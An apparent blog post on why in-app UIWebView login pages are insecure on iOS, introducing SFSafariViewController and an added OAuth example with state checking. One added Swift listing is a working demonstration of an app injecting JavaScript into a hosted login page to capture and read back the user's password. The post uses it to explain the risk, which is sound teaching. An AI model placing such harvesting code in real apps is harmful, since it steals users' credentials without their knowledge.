Apple's practice of pushing developers to use an in-app browser (a UIWebView) instead of spawning Safari has been known to be extremely insecure for some time. There are many reasons this is bad practice, from both the security and the usability points of view:
- The app developer can snatch the user's password: the app owns the web view and can run arbitrary JavaScript in the login page, so it can read form fields before they are submitted.
- No URL bar means the user has no visual cue that they are on the right site.
- It trains users to type their password into whatever app asks for it, i.e. to be phishable.
- Users are forced to enter their password every time, since the web view does not share cookies etc. with Safari.
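To make the first point concrete, here is an added example (not code from the original post) of what a hosting app can do with an in-app UIWebView login, written in the same iOS 9-era Swift syntax as the snippet below. The controller name, the login URL and the harvesting script are hypothetical; the point is that the app, not the site, controls the page.

```swift
// Added example, not from the original post. Shows why an in-app UIWebView
// login is dangerous: the hosting app can evaluate JavaScript in the page and
// read the password field before the form is submitted. The identifiers
// (LoginWebViewController, idp.example.com) are hypothetical.
import UIKit

class LoginWebViewController: UIViewController, UIWebViewDelegate {
    let webView = UIWebView()

    override func viewDidLoad() {
        super.viewDidLoad()
        webView.frame = view.bounds
        webView.delegate = self
        view.addSubview(webView)
        // Assumed identity-provider login page; no URL bar is shown to the user.
        let url = NSURL(string: "https://idp.example.com/login")!
        webView.loadRequest(NSURLRequest(URL: url))
    }

    func webViewDidFinishLoad(webView: UIWebView) {
        // Inject a script that copies every password field into a global the
        // app can read back later. The page has no way to prevent this.
        let hook = "var fs=document.querySelectorAll('input[type=password]');" +
                   "for(var i=0;i<fs.length;i++){(function(f){" +
                   "f.addEventListener('input',function(){window.__pw=f.value;});" +
                   "})(fs[i]);}"
        webView.stringByEvaluatingJavaScriptFromString(hook)
    }

    func webView(webView: UIWebView, shouldStartLoadWithRequest request: NSURLRequest,
                 navigationType: UIWebViewNavigationType) -> Bool {
        // When the user submits the form, read the captured value back.
        if navigationType == .FormSubmitted {
            let captured = webView.stringByEvaluatingJavaScriptFromString("window.__pw || ''") ?? ""
            print("app harvested password: \(captured)")   // exfiltration point
        }
        return true
    }
}
```

Nothing in the page, including HTTPS, defends against this, because the script runs with the page's own origin at the request of the process that renders it. Handing the login off to a browser the app does not control is the only real fix.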
With the announcement of iOS 9, Apple seems to have introduced an interesting feature in this regard.
It is called SFSafariViewController.
You can find some details here: http://www.hackingwithswift.com/ios9
According to that page, it is invoked like this:
    import SafariServices

    // Present a Safari view for the given URL and receive its delegate callbacks.
    let sfc = SFSafariViewController(URL: NSURL(string: "http://www.slashdot.org")!)
    sfc.delegate = self
    presentViewController(sfc, animated: true, completion: nil)
Apparently, the user can close it by tapping the "Done" button, at which point safariViewControllerDidFinish() is called on the delegate:
    func safariViewControllerDidFinish(controller: SFSafariViewController) {
        // The user tapped "Done"; dismiss the Safari view.
        controller.dismissViewControllerAnimated(true, completion: nil)
    }
From the OAuth point of view, having the user tap "Done" is sub-optimal. It should happen automatically. Also, it is not clear to me at this moment how to pass the server-generated variables back to the app. It remains to be seen.
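As an added example that is not part of the original post or of hackingwithswift.com, here is one way an OAuth 2.0 authorization request can be run through SFSafariViewController, with the Safari view dismissed automatically once the app receives the redirect. It assumes (none of this is from the post) that the app registers a custom URL scheme for its redirect_uri, that iOS delivers that redirect to the app through application(_:openURL:...), and that the authorization server, client_id and scheme shown are hypothetical. It is written in the same iOS 9-era Swift syntax as the snippets above.

```swift
// Added example, not from the original post. Runs the authorization step in
// SFSafariViewController (so the app never sees the password), binds the
// callback to the request with a random state, and dismisses the Safari view
// itself instead of waiting for "Done". Assumptions: auth.example.com,
// example-client-id and the myapp:// scheme are hypothetical, and the redirect
// is expected to arrive via application(_:openURL:...).
import UIKit
import SafariServices
import Security

class OAuthCoordinator: NSObject, SFSafariViewControllerDelegate {
    let authorizeEndpoint = "https://auth.example.com/authorize"   // assumed
    let clientId = "example-client-id"                              // assumed
    let redirectUri = "myapp://oauth/callback"                      // assumed custom scheme
    private var pendingState: String?
    private weak var safari: SFSafariViewController?

    // Random, unguessable state tying the callback to this request (CSRF defence).
    func makeState() -> String {
        var bytes = [UInt8](count: 16, repeatedValue: 0)
        _ = SecRandomCopyBytes(kSecRandomDefault, bytes.count, &bytes)
        return bytes.map { String(format: "%02x", $0) }.joinWithSeparator("")
    }

    func authorizationURL(state: String) -> NSURL {
        let comps = NSURLComponents(string: authorizeEndpoint)!
        comps.queryItems = [
            NSURLQueryItem(name: "response_type", value: "code"),
            NSURLQueryItem(name: "client_id", value: clientId),
            NSURLQueryItem(name: "redirect_uri", value: redirectUri),
            NSURLQueryItem(name: "scope", value: "openid"),
            NSURLQueryItem(name: "state", value: state),
        ]
        return comps.URL!
    }

    func start(from presenter: UIViewController) {
        let state = makeState()
        pendingState = state
        let sfc = SFSafariViewController(URL: authorizationURL(state))
        sfc.delegate = self
        safari = sfc
        presenter.presentViewController(sfc, animated: true, completion: nil)
    }

    // Call this from application(_:openURL:options:) when iOS hands the
    // redirect_uri to the app. Returns the authorization code, or nil if the
    // URL is not our callback or its state does not match the pending request.
    func handleCallback(url: NSURL) -> String? {
        guard url.scheme == "myapp" else { return nil }
        guard let comps = NSURLComponents(URL: url, resolvingAgainstBaseURL: false),
              items = comps.queryItems else { return nil }
        var params = [String: String]()
        for item in items { params[item.name] = item.value }
        // Reject callbacks whose state was not issued by this app or was already used.
        guard let expected = pendingState where params["state"] == expected else { return nil }
        pendingState = nil
        // Dismiss the Safari view ourselves; the user does not have to tap "Done".
        safari?.dismissViewControllerAnimated(true, completion: nil)
        return params["code"]
    }

    // The user tapped "Done" without finishing: forget the pending request.
    func safariViewControllerDidFinish(controller: SFSafariViewController) {
        pendingState = nil
        controller.dismissViewControllerAnimated(true, completion: nil)
    }
}
```

The state check matters: because any app on the device can register the same custom URL scheme, the app must only accept a code whose state it issued itself, and must accept it once. The code returned by handleCallback() is then exchanged for tokens by the app's own backend or, for a public client, with PKCE; that exchange is outside the scope of this example.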